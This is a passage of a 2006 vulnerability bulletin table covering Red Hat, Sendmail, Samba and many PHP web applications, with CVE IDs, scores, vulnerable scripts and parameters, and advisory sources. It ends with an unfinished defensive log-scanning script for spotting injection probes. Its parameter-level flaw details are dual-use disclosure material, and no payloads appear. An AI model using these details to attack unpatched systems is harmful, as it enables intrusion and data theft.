RedHat Security Advisory, RHSA-2005:361-19, October 5, 2005

RedHat Security Advisory, RHSA-2006:0117-7, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

RedHat

RedHat initscripts 7.93.24, Enterprise Linux WS 4, ES 4, AS 4, Desktop 4.0

A vulnerability has been reported when the 'sbin/service' command is run due to an error when handling certain variables, which could let a malicious user obtain elevated privileges.

Updates available

SGI

Currently we are not aware of any exploits for this vulnerability.

Red Hat Initscripts Elevated Privileges

CVE-2005-3629

7

RedHat Security Advisory, RHSA-2006:0016-18, March 7, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Samba.org

Samba 3.0.21, a-c

A vulnerability has been reported because the 'winbindd' daemon saves the machine trust account credentials to world-readable winbind log files in clear text, which could let a malicious user obtain sensitive information.

Patches available

Fedora

Trustix

There is no exploit code required.

Samba Machine Trust Account Information Disclosure

CVE-2006-1059

1.6

Secunia Advisory: SA19455, March 30, 2006

Trustix Secure Linux Security Advisory #2006-0018, April 4, 2006

Sendmail Consortium

Sendmail prior to 8.13.6

A vulnerability has been reported due to a race condition caused by the improper handling of asynchronous signals, which could let a remote malicious user execute arbitrary code.

Updates available

RHSA-2006:0264-8

RHSA-2006:0265-9

Fedora

Gentoo

AIX

Sun

SuSE

FreeBSD

Slackware

OpenBSD

Avaya

Debian

HP

NetBSD

SGI

F-Secure

SGI

A Proof of Concept exploit script, sendtest.c, has been published.

Sendmail Asynchronous Signal Handling Remote Code Execution

CVE-2006-0058

8

Internet Security Systems Protection Advisory, March 22, 2006

Technical Cyber Security Alert TA06-081A

US-CERT VU#834865

RedHat Security Advisories, RHSA-2006:0264-8 & RHSA-2006:0265-9, March 22, 2006

Sun(sm) Alert Notification, Sun Alert ID: 102262, March 24, 2006

Gentoo Linux Security Advisory, GLSA 200603-21, March 22, 2006

SUSE Security Announcement, SUSE-SA:2006:017, March 22, 2006

FreeBSD Security Advisory, FreeBSD-SA-06:13, March 22, 2006

Slackware Security Advisory, SSA:2006-081-01, March 22, 2006

Avaya Security Advisory, ASA-2006-074, March 24, 2006

Debian Security Advisory, DSA-1015-1, March 24, 2006

HP Security Bulletin, HPSBUX02108, March 27, 2006

NetBSD Security Advisory, NetBSD-SA2006-010, March 28, 2006

SGI Security Advisory, 20060302-01-P, March 22, 2006

F-Secure Security Bulletin, FSC-2006-2, March 28, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

storeBackup

storeBackup 1.18-1.18.4

A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user obtain sensitive information.

Upgrades available

SUSE

Debian

There is no exploit code required.

StoreBackup Insecure Temporary File Creation

CVE-2005-3146
CVE-2005-3147
CVE-2005-3148

2.3
(CVE-2005-3146)

2.3
(CVE-2005-3147)

5.6
(CVE-2005-3148)

Security Focus, Bugtraq ID: 14985, September 30, 2005

SUSE Security Summary Report, SUSE-SR:2005:021, September 30, 2005

Debian Security Advisory, DSA-1022-1, April 4, 2006

Sun Microsystems, Inc.

Solaris 9.0 _x86, 9.0, 8.0 _x86, 8.0, Sun Cluster 3.1 4/04

A vulnerability has been reported in the SunPlex Manager GUI due to an unspecified error, which could let a malicious user obtain sensitive information.

Update information

There is no exploit code required.

Sun Cluster SunPlex Manager Information Disclosure

CVE-2006-1601

1

Sun(sm) Alert Notification, Sun Alert ID: 102278, March 29, 2006

The Open Group

Open Motif 2.2.3

Two buffer overflow vulnerabilities have been reported in libUil (User Interface Language): a buffer overflow vulnerability was reported in 'diag_issue_diagnostic()' due to the use of the vsprintf() libc procedure, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported in 'open_source_file()' due to the use of the strcpy() libc procedure, which could let a remote malicious user execute arbitrary code.

Gentoo

RedHat

Currently we are not aware of any exploits for these vulnerabilities.

Open Motif libUil Buffer Overflows

CVE-2005-3964

Security Focus, Bugtraq ID: 15678, December 2, 2005

Gentoo Linux Security Advisory, GLSA 200512-16, December 28, 2005

Red Hat Security Advisory, RHSA-2006:0272-01, April 4, 2006

xine

xine-lib 1.1.1

A buffer overflow vulnerability has been reported when processing a malformed MPEG stream due to a failure to properly bounds check user-supplied input data prior to copying it to an insufficiently-sized memory buffer, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, xinelib_poc.pl, has been published.

Xine-Lib Malformed MPEG Stream Buffer Overflow

Not Available

Security Focus, Bugtraq ID: 17370, April 4, 2006

Multiple Operating Systems - Windows/UNIX/Linux/Other

Vendor & Software Name

Description

Common Name

CVSS

Resources

3dsrc.com

MonAlbum 0.8.7

SQL injection vulnerabilities have been reported in 'image_agrandir.php' due to insufficient sanitization of the 'pnom' and 'pcourriel' parameters and in 'index.php' due to insufficient sanitization of the 'pc' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

MonAlbum SQL Injection

CVE-2006-1585

4.7

Secunia Advisory: SA19503, April 3, 2006

AngelineCMS

AngelineCMS 0.8.1

A file include vulnerability has been reported in 'Loadkernel.PHP' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, angelineCMS.pl, has been published.

AngelineCMS Remote File Include

CVE-2006-1653

Not Available

Security Focus, Bugtraq ID: 17371, April 4, 2006

Apache Software Foundation

libapreq2 2.0.6

A remote Denial of Service vulnerability has been reported due to errors in the 'apreq_parse_headers()' and 'apreq_parse_urlencoded()' functions.

Update available

Debian

DSA 1000-2

Currently we are not aware of any exploits for this vulnerability.

Apache Libapreq2 Remote Denial of Service

CVE-2006-0042

2.3

Security Focus, Bugtraq ID: 16710, February 17, 2006

Debian Security Advisory, DSA-1000-1, March 14, 2006

Debian Security Advisory, DSA 1000-2, April 3, 2006

Apache Software Foundation

Struts prior to 1.2.9

Multiple vulnerabilities have been reported: a vulnerability was reported in 'RequestProcessor' because all actions can be cancelled, which could let a remote malicious user bypass security restrictions; a remote Denial of Service vulnerability was reported in 'ActionForm' because the public method 'getMultipartRequestHandler()' gives access to elements in 'CommonsMultipartRequestHandler' and 'BeanUtils;' and a vulnerability was reported in 'LookupDispatchAction' due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerabilities can be exploited through a web client.

Apache Struts Multiple Vulnerabilities

CVE-2006-1546
CVE-2006-1547
CVE-2006-1548

7
(CVE-2006-1546)

3.3
(CVE-2006-1547)

2.3
(CVE-2006-1548)

Security Focus, Security Tracker Alert ID: 1015856, April 1, 2006

aphpkb

aphpkb 0.57

Multiple Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of user-supplied input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Andy's PHP Knowledgebase Multiple Cross-Site Scripting

CVE-2006-1438

7

Security Focus, Bugtraq ID: 17377, March 27, 2006

Arab Portal

Arab Portal 2.0.1 Stable

Multiple input-validation vulnerabilities have been reported including Cross-Site Scripting and SQL injection, which could let a remote malicious user execute arbitrary HTML, script code, and SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

ArabPortal Multiple Input Validation

Security Focus, Bugtraq ID: 17375, April 4, 2006

aWeb Labs

aWebBB 1.2

Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported in 'post.php' due to insufficient sanitization of the 'tname' and 'fpost' parameters, in 'editac.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' 'country,' 'sig,' and 'otherav' parameters, and in 'register.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' and 'country' parameters, which could let a remote malicious user execute arbitrary HTML and script code; and SQL injection vulnerabilities were reported in 'accounts.php,' 'changep.php,' 'editac.php,' 'feedback.php,' 'fpass.php,' 'login.php,' 'post.php,' 'reply.php,' and reply_log.php' due to insufficient sanitization of the 'username' parameter, in 'dpost.php' due to insufficient sanitization of the 'p' parameter, in 'ndis.php' and 'list.php' due to insufficient sanitization of the 'c' parameter, and in 'search.php' due to insufficient sanitization of the 'q' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through use of a web client.

AWebBB Multiple Input Validation

CVE-2006-1637
CVE-2006-1638

2.3
(CVE-2006-1637)

1.9
(CVE-2006-1638)

Secunia Advisory: SA19486, April 3, 2006

Barracuda Networks

Barracuda Spam Firewall with firmware prior to 3.3.03.022 and with spamdef prior to 3.0.10045

Several buffer overflow vulnerabilities have been reported: a buffer overflow vulnerability was reported when a remote malicious user submits email that contains a specially crafted LHA archive with a long filename, which could lead to the execution of arbitrary code; and a buffer overflow vulnerability was reported when a remote malicious user submits an email that contains a specially crafted ZOO archive, which could lead to the execution of arbitrary code.

Update to firmware version 3.3.03.022.

Currently we are not aware of any exploits for these vulnerabilities.

Barracuda Spam Firewall Buffer Overflows

CVE-2004-0234
CVE-2006-0855

10
(CVE-2004-0234)

3.9
(CVE-2006-0855)

Security Tracker Alert ID: 1015866, April 4, 2006

BASE Basic Analysis and Security Engine

BASE Basic Analysis and Security Engine 1.2-1.2.2

A vulnerability has been reported in 'base_maintenance.php' due to an unspecified error, which could let a remote malicious user bypass authentication mechanisms.

Updates available

Vulnerability could be exploited with a web client.

Basic Analysis and Security Engine Authentication Bypass

CVE-2006-1505

2.3

Secunia Advisory: SA19510, April 3, 2006

Cisco Systems

CSS11500 Content Services Switch 7.30 (00.09)S, 7.30 (00.08)S, 7.20 (03.10)S, 7.20 (03.09)S, 7.10 (05.07)S, 7.5, 7.4, CSS11500 Content Services Switch

A remote Denial of Service vulnerability has been reported in the HTTP compression functionality.

Workaround information

Currently we are not aware of any exploits for this vulnerability.

Cisco 11500 Content Services Switch Remote Denial of Service

CVE-2006-1631

2.3

Cisco Security Advisory, cisco-sa-20060405, April 5, 2006

Claroline

Claroline 1.7.4, 1.7.2, 1.6, rc1, beta, 1.5.4, 1.5.3, 1.5

Multiple vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before using to view files, which could let a remote malicious user obtain sensitive information; a Cross-Site Scripting vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; and a file include vulnerability was reported in 'claroline/learnPath/include/scormExport.inc.php' due to insufficient verification of the 'includePath' before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client; however, Proof of Concept exploit scripts, claroline-1.7.4-remote-and-local-file-include.php and claroline_174_incl_xpl.html, have been published.

Claroline Multiple Vulnerabilities

CVE-2006-1594
CVE-2006-1595
CVE-2006-1596

7
(CVE-2006-1594)

2.3
(CVE-2006-1595)

4.9
(CVE-2006-1596)

Secunia Advisory: SA19461, April 3, 2006

CzarNews

CzarNews 1.14

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'news.php' due to insufficient sanitization of the 'email' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'cn_auth.php' due to insufficient sanitization of the 'usern' and 'passw' parameters, in 'news.php' due to insufficient sanitization of the 's' parameter, and in 'dpost.php' due to insufficient sanitization of the 'a' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities could be exploited with a web client.

CzarNews Script Insertion & SQL Injection

CVE-2006-1640
CVE-2006-1641

2.3
(CVE-2006-1640)

Secunia Advisory: SA19541, April 5, 2006

dbbs.sup.fr

DbbS 2.0-alpha & prior

An SQL injection vulnerability has been reported in 'topics.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

DbbS SQL Injection

CVE-2006-1579

7

Security Focus, Bugtraq ID: 17338, March 31, 2006

DIA

DIA 0.87-0.94

Multiple remote buffer overflow vulnerabilities have been reported due to a failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers, which could let a remote malicious user execute arbitrary code.

The vendor has released version 0.95-pre6, along with a patch for 0.94 to address these issues.

Mandriva

Ubuntu

Fedora

Debian

Currently we are not aware of any exploits for these vulnerabilities.

DIA XFIG File Import Multiple Remote Buffer Overflows

CVE-2006-1550

5.6

Security Focus, Bugtraq ID: 17310, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:062, April 3, 2006

Debian Security Advisory, DSA-1025-1, April 6, 2006

Esqlanelapse

Esqlanelapse 2.2, 2.0

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerability could be exploited with a web client.

Esqlanelapse Cross-Site Scripting

CVE-2006-1570

2.3

Security Focus, Bugtraq ID: 17331, April 1, 2006

Exponent

Exponent CMS prior to 0.96.5 RC 1

Vulnerabilities have been reported in the banner module and image functionality due to unspecified input validation errors, which could let a remote malicious user execute arbitrary PHP code.

The vendor has released version 0.96.5-RC1 to address this issue.

Vulnerabilities can be exploited through a web client.

Exponent CMS Arbitrary Script Execution

CVE-2006-1604
CVE-2006-1605
CVE-2006-1606
CVE-2006-1607

7
(CVE-2006-1604)

7
(CVE-2006-1605)

2.3
(CVE-2006-1606)

7
(CVE-2006-1607)

Security Focus, Bugtraq ID: 17357, April 3, 2006

Fred Scalliet

Blank'N'Berg 0.2

Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported due to insufficient validation of the '_path' parameter, which could let a remote malicious user obtain sensitive information; and a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of the '_path' parameter before displaying, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

Vulnerabilities may be exploited with a web client; however, Proof of Concept exploits have been published.

Blank'N'Berg Directory Traversal & Cross-Site Scripting

CVE-2006-1581
CVE-2006-1582

4.7
(CVE-2006-1581)

4.7
(CVE-2006-1582)

Security Tracker Alert ID: 1015854, March 31, 2006

gtd-php

gtd-php 0.5

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of input passed to various fields in 'newProject.php,' 'newList.php,' 'newWaitingOn.php,' 'newChecklist.php,' 'newContext.php,' 'newCategory.php,' and 'newGoal.php' before using, which could let a remote malicious user execute arbitrary HTML and script code; and a Script Insertion vulnerability was reported due to insufficient sanitization of the 'listTItle' parameter in 'listReport.php,' in 'projectReport.php' due to insufficient sanitization of the 'projectName' parameter, and in 'checklistReport.php' due to insufficient sanitization of the 'checklistTitle' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited via a web client.

gtd-php Cross-Site Scripting & Script Insertion

CVE-2006-1479

2.3

Secunia Advisory: SA19512, April 3, 2006

Hitachi

Groupmax World Wide Web 2.x, 3.x, World Wide Web Desktop 5.x, 6.x, World Wide Web Desktop for Jichitai 6.x,World Wide Web Desktop for Scheduler 5.x, World Wide Web for Scheduler 2.x, 3.x

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Update information

Vulnerability can be exploited through a web client.

Hitachi Groupmax World Wide Web Cross-Site Scripting

CVE-2006-1574

4.7

Hitachi Security Advisory, HS06-005, March 31, 2006

Horde

Horde 3.0-3.0.9, 3.1

A vulnerability has been reported in Help Viewer which could let a remote malicious user execute arbitrary PHP code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

Horde Help Viewer Remote PHP Code Execution

CVE-2006-1491

7

Security Focus, Bugtraq ID: 17292, March 29, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Interact

Interact 2.1, 2.1.1

Multiple vulnerabilities have been reported: a vulnerability was reported in the 'login.php' script because different error responses are returned depending on whether the username is valid or invalid, which could let a remote malicious user obtain sensitive information; a vulnerability was reported due to insufficient sanitization of the 'search_terms' parameter in 'search.php' and various fields when creating an account, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' due to insufficient sanitization of the 'user_name' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Interact Multiple Vulnerabilities

CVE-2006-1642
CVE-2006-1643
CVE-2006-1644

Not Available

Secunia Advisory: SA19488, April 5, 2006

ISPofEgypt

Site Man 0

An SQL injection vulnerability has been reported in 'admin_login.asp' due to insufficient sanitization of the 'txtpassword' parameter before using in a SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

SiteMan SQL Injection

CVE-2006-1586

7

Secunia Advisory: SA19500, April 3, 2006

Jaakko Keranen

Doomsday Engine 1.9, 1.8.6

Format string vulnerabilities have been reported in the 'Con_Message()' and 'conPrintf()' functions when connecting to port 13209/tcp and passing a specially crafted JOIN command, which could let a remote malicious user cause a Denial of Service or execute arbitrary code.

Gentoo

Vulnerabilities can be exploited through use of a web client; however, a Proof of Concept exploit has been published.

Doomsday Engine Format Strings

CVE-2006-1618

7

Security Tracker Alert ID: 1015860, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-05, April 6, 2006

KGB

KGB Archiver 1.1.5 21

A Directory Traversal vulnerability has been reported when decompressing archives due to an input validation error, which could let a remote malicious user obtain sensitive information.

Update available

There is no exploit code required.

KGB Archiver Directory Traversal

CVE-2006-1611

2.3

Secunia Advisory: SA19511, April 3, 2006

lucidCMS

lucidCMS 2.0.0 RC4

Cross-Site Scripting vulnerabilities have been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

LucidCMS Cross-Site Scripting

CVE-2006-1634
CVE-2006-1635

2.3
(CVE-2006-1634)

2.3
(CVE-2006-1635)

Security Focus, Bugtraq ID: 17360, April 3, 2006

Mantis

Mantis 1.0.1, 1.0.0rc5 & prior

Cross-Site Scripting vulnerabilities have been reported in 'view_all_set.php' due to insufficient sanitization of the 'start_day,' 'start_year,' and 'start_month' parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

Mantis Cross-Site Scripting

CVE-2006-1577

7

Security Focus, Bugtraq ID: 17326, March 31, 2006

mediaslash.com

MediaSlash Gallery 0

A file include vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

MediaSlash Gallery Remote File Include

CVE-2006-1573

7

Security Focus, Bugtraq ID: 17323, March 30, 2006

MyBB Group

MyBulletinBoard 1.10

An HTML injection vulnerability has been reported due to insufficient sanitization of the 'email' BBcode tag when posting a message, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited via a web client.

MyBulletinBoard Email HTML Injection

CVE-2006-1625

7

Security Focus, Bugtraq ID: 17368, April 4, 2006

MySQL AB

MySQL 5.0.18

A vulnerability has been reported when handling query logging due to a discrepancy between the handling of NULL bytes in input data, which could let a remote malicious user bypass certain security restrictions.

Mandriva

A Proof of Concept exploit has been published.

MySQL Query Logging Bypass

CVE-2006-0903

4.9

Security Focus, Bugtraq ID: 16850, February 27, 2006

Mandriva Security Advisory, MDKSA-2006:064, April 3, 2006

NetBSD

NetBSD 3.0, 2.1, 2.0-2.0.3, 1.6-1.6.2

A vulnerability has been reported in 'If_Bridge(4)' because used stack memory is not zeroed out by IOCTL calls, which could let a malicious user obtain sensitive information.

Patches available

Currently we are not aware of any exploits for this vulnerability.

NetBSD Information Disclosure

CVE-2006-1588

1.6

NetBSD Security Advisory, NetBSD-SA2006-005, March 30, 2006

NetBSD

NetBSD 1.x

A vulnerability has been reported because the 'mail' program creates records with insecure permissions when the 'set record' setting is present in a user's .mailrc and the default umask is set, which could let a malicious user obtain sensitive information.

Patch information

Currently we are not aware of any exploits for this vulnerability.

NetBSD mail(1) Insecure File Permissions

CVE-2006-1587

1.6

NetBSD Security Advisory, NetBSD-SA2006-007, March 30, 2006

o2php.com

Oxygen 1.1-1.1.3

An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of the 'fid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

Oxygen SQL Injection

CVE-2006-1572

2.3

Secunia Advisory: SA19481, March 31, 2006

PHP Group

PHP 4.3.x, 4.4.x, 5.0.x, 5.1.x

A vulnerability has been reported in the 'html_entity_decode()' function because it is not binary safe, which could let a remote malicious user obtain sensitive information.

The vulnerability has been fixed in the CVS repository and in version 5.1.3-RC1.

Mandriva

There is no exploit code required; however, a Proof of Concept exploit has been published.

PHP Information Disclosure

CVE-2006-1490

2.3

Secunia Advisory: SA19383, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:063, April 2, 2006

phpBB Group

phpBB 2.0.19

A Cross-Site Scripting vulnerability has been reported in 'profile.php' due to insufficient sanitization of the 'cur_password' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through use of a web client.

phpBB Cross-Site Scripting

CVE-2006-1603

2.3

Secunia Advisory: SA19494, April 3, 2006

phpMyChat

phpMyChat 0.14.5, 0.14.4

An SQL injection vulnerability has been reported in 'MessagesL.PHP3' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, phpMyChat_0.14.5_SQLINJ.php, has been published.

PHPMyChat SQL Injection

Not Available

Security Focus, Bugtraq ID: 17382, April 5, 2006

PHPNuke-Clan

PHPNuke-Clan 3.0.1

A file include vulnerability has been reported in 'modules/vWar_account/includes/functions_common.php' due to insufficient verification of the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, pnc.pl.txt, has been published.

PHPNuke-Clan Remote File Include

CVE-2006-1602

7

Security Focus, Bugtraq ID: 17356, April 3, 2006

PHPSelect

Submit-A-Link 0

An HTML injection vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, Proof of Concept exploit scripts, linksubmit_poc.pl and linksubmit.txt, have been published.

PHPSelect Submit-A-Link HTML Injection

CVE-2006-1622

7

Security Focus, Bugtraq ID: 17348, April 1, 2006

r2xDesign

qliteNews 2005.07.01

An SQL injection vulnerability has been reported in 'loginprocess.php' due to insufficient sanitization of the 'username' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

qliteNews SQL Injection

CVE-2006-1571

5.6

Secunia Advisory: SA19476, March 31, 2006

redcms.co.uk

RedCMS 0.1

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'register.php' due to insufficient sanitization of the 'Email,' 'Location,' and 'website' fields before storing in a member's profile, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' and 'register.php' due to insufficient sanitization of the 'username' parameter and in 'profile.php' due to insufficient sanitization of the 'u' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

RedCMS SQL Injection & Script Insertion

CVE-2006-1568
CVE-2006-1569

5.6
(CVE-2006-1568)

5.6
(CVE-2006-1569)

Secunia Advisory: SA19475, March 31, 2006

ReloadCMS

ReloadCMS 1.2.5

A vulnerability has been reported due to insufficient sanitization of the 'User-Agent' header field in an HTTP request before displaying, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

There is no exploit code required; however, a Proof of Concept exploit script, reloadcms_poc, has been published.

ReloadCMS HTML Injection

CVE-2006-1645

Not Available Security Focus, Bugtraq ID: 17353, April 2, 2006

SkinTech

X-Changer 0.2

SQL injection vulnerabilities have been reported in 'index.php' due to insufficient sanitization of the 'from,' 'into,' and 'id' parameters before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

X-Changer SQL Injection

CVE-2006-1557

7 Secunia Advisory: SA19459, March 31, 2006

SoftBiz

Image Gallery 0

Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Softbiz Image Gallery Multiple SQL Injection
Not Available Security Focus, Bugtraq ID: 17339, March 31, 2006

v-creator.com

v-creator prior to 1.3-pre3

A vulnerability has been reported in 'VCEngine.php' due to an input validation error in the 'encrypt()' and 'decrypt()' functions, which could let a remote malicious user execute arbitrary shell commands.

Vulnerability has been fixed in version 1.3-pre3.

Vulnerability can be exploited via a web client.

V-creator Remote Shell Code Execution

CVE-2006-1599

7 Security Focus, Bugtraq ID: 17328, April 3, 2006

vscripts.pl

QLnews 1.2

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autorx' and 'newsx' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in 'admin.php' due to insufficient sanitization of input passed to configuration parameters before storing in 'config.php', which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

QLnews Multiple Input Validation

CVE-2006-1575
CVE-2006-1576

7
(CVE-2006-1575)

7
(CVE-2006-1576)

Security Focus, Bugtraq ID: 17335, April 3, 2006

vscripts.pl

VBook 2.0

Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autor,' 'email,' 'www,' 'temat,' and 'tresc' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported in 'index.php' due to insufficient sanitization of the 'x' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported in 'config.php' due to insufficient sanitization of configuration parameters in 'admin.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VBook Input Validation

CVE-2006-1561
CVE-2006-1562
CVE-2006-1563

5.6
(CVE-2006-1561)

7
(CVE-2006-1562)

8
(CVE-2006-1563)

Secunia Advisory: SA19448, March 30, 2006

vscripts.pl

VNews 1.2

Multiple vulnerabilities have been reported: an SQL injection vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'loginvar' parameter, in 'news.php' due to insufficient sanitization of the 'news' parameter, and in 'news.php' due to insufficient sanitization of the 'nom' parameter, which could let a remote malicious user execute arbitrary SQL code; a Cross-Site Scripting vulnerability was reported in 'news.php' due to insufficient sanitization of the 'autorkomentarza' and 'tresckomentarza' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in the administration section when editing variables in 'admin/config.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VNews Multiple Input Validation

CVE-2006-1543
CVE-2006-1544
CVE-2006-1545

7
(CVE-2006-1543)

2.3
(CVE-2006-1544)

6
(CVE-2006-1545)

Secunia Advisory: SA19435, March 30, 2006

VWar

VWar 1.3-1.5

A file include vulnerability was reported in 'get_header.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_R12.pl, has been published.

VWar Remote File Include

CVE-2006-1636

7 Security Focus, Bugtraq ID: 17358, April 3, 2006

VWar

VWar 1.5 & prior

A file include vulnerability has been reported in 'include/functions_install.php' due to insufficient verification of the 'vwar_root' parameter before using it to include files, which could let a remote malicious user execute arbitrary PHP code.

Updates available

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_RCE.php, has been published.

Virtual War File Inclusion

CVE-2006-1503

5.6

Secunia Advisory: SA19438, March 29, 2006

Secunia Advisory: SA19438, April 4, 2006
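Nearly every entry in this table is reachable with a plain web client, so the first use a defender can make of it is to look for the probes in web server logs. The script below is an added example, not US-CERT or vendor code: it parses Combined Log Format lines and flags the three request shapes catalogued here (SQL quote or comment characters in a parameter value, script markup in a parameter or in the User-Agent header as in the ReloadCMS entry, and a remote URL in a file-include parameter such as VWar's 'vwar_root'). The sample log lines are constructed and use documentation addresses; only the script and parameter names come from the entries above.

```python
"""Added example (not US-CERT or vendor code): triage scanner that runs the
injection shapes catalogued in this bulletin over Combined Log Format lines."""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Coarse indicators, one per vulnerability class in this table. They are meant
# for triage of one host's logs, not as a blocking rule set.
RULES = {
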